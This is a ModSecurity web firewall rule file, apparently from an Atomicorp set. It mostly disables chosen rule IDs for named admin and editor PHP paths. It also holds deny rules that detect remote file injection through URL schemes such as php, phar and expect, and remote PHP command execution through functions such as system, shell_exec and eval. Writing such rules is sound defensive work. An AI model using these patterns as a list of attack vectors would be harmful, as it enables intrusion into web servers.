SecRule REQUEST_FILENAME "/services/prefs\.php" "phase:2,id:91791,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/admin/update-page\.php" "phase:2,id:91792,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/uploadify/uploadify\.php" "phase:2,id:91793,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/admin/savestory\.php" "phase:2,id:91794,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/chat/server\.php" "phase:2,id:91795,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/cha-insertproduct\.php" "phase:2,id:91796,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/ezedit/server\.php" "phase:2,id:91797,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/cometchat_receive\.php" "phase:2,id:91798,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"

SecRule REQUEST_FILENAME "/admin/news_editresult\.php" "phase:2,id:91799,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/admin/news\.php" "phase:2,id:91800,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/items_attribute_result\.php" "phase:2,id:91801,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/bcadmn/index\.php" "phase:2,id:91802,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/thub\.php" "phase:2,id:91803,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/sidenavsave\.php" "phase:2,id:91804,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/imp/message\.php" "phase:2,id:91805,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/cgi-bin/editor/wsd" "phase:2,id:91806,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/sitesettings\.php" "phase:2,id:91807,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/workadmin\.php" "phase:2,id:91808,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/addons/imagelibrary/select_image\.php" "phase:2,id:91809,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/news_edit\.php" "phase:2,id:91810,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/wp-faq-css\.php" "phase:2,id:91811,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/cfk-action\.php" "phase:2,id:91812,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/htmle\.php" "phase:2,id:91813,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/product_edit\.php" "phase:2,id:91814,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/cgi-bin/backuppc_admin" "phase:2,id:91815,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390709"

SecRule REQUEST_FILENAME "/delivery/spc\.php" "phase:2,id:91816,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/includes/share\.php" "phase:2,id:91817,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/kronolith/" "phase:2,id:91818,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/delivery/ajs\.php" "phase:2,id:91819,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/browse\.php" "phase:2,id:91820,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/watermark\.php" "phase:2,id:91821,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91822,t:none,pass,nolog,skipAfter:END_RULES_91822"

SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "phase:2,deny,log,auditlog,status:403,capture,id:330477,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" 	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,id:330478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91822

SecRule REQUEST_FILENAME "/addcontent\.php" "phase:2,id:91823,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340161"

SecRule REQUEST_FILENAME "/showmail\.php" "phase:2,id:91824,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"

SecRule REQUEST_FILENAME "/aprogram\.php" "phase:2,id:91825,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/admin/edit-event\.php" "phase:2,id:91826,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:91827,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:91828,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/company/modify\.php" "phase:2,id:91829,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/dimcp/setting\.php" "phase:2,id:91830,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/jg_radiof\.php" "phase:2,id:91831,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/tiki-editpage\.php" "phase:2,id:91832,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=380025"

SecRule REQUEST_FILENAME "/power_news_add\.php" "phase:2,id:91833,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/jg_teksta\.php" "phase:2,id:91834,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/static_content_editresult\.php" "phase:2,id:91835,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/shopadmin/login\.php" "phase:2,id:91836,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sgal_thumb\.php" "phase:2,id:91837,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/livehelp/image\.php" "phase:2,id:91838,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:91839,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/saveconfig\.php" "phase:2,id:91840,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/products\.php" "phase:2,id:91841,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/edit-process\.php" "phase:2,id:91842,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:91843,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/freepost\.php" "phase:2,id:91844,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/advertpro/admin/admin\.pl" "phase:2,id:91845,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/inc/flash_to_db_insert\.php" "phase:2,id:91846,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/blocks/form/services\.php" "phase:2,id:91847,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/admin/settings/" "phase:2,id:91848,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:91849,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/editimage\.html" "phase:2,id:91850,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/siteprefs\.php" "phase:2,id:91851,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148"

SecRule REQUEST_FILENAME "/admin/include/update\.php" "phase:2,id:91852,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/directory\.php" "phase:2,id:91853,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/video_add\.php" "phase:2,id:91854,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147"

SecRule REQUEST_FILENAME "/admin/products/entry/index\.php" "phase:2,id:91855,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/editconfirm\.php" "phase:2,id:91856,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/connectors/element/snippet\.php" "phase:2,id:91857,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340016"
SecAction "phase:2,id:91858,t:none,pass,nolog,skipAfter:END_RULES_91858"


SecRule REQUEST_URI|ARGS "< ?\?" 	"t:none,t:urlDecodeUni,t:lowercase,phase:2,deny,log,auditlog,status:403,capture,chain,id:361128,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
SecRule REQUEST_URI|ARGS|!ARGS:view|!ARGS:payment_extrainfo|!ARGS:solution|!ARGS:snippet|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+) ?\(|system\( ?getenv ?\( ?http_php ?\) ?\))"


SecMarker END_RULES_91858

SecRule REQUEST_FILENAME "/plugins/podpress/podpress_backend\.ph" "phase:2,id:91859,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/productos_edit\.php" "phase:2,id:91860,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/produto_script\.php" "phase:2,id:91861,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/db_structure\.php" "phase:2,id:91862,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:91863,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/hades_framework/option_panel/ajax\.php" "phase:2,id:91864,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
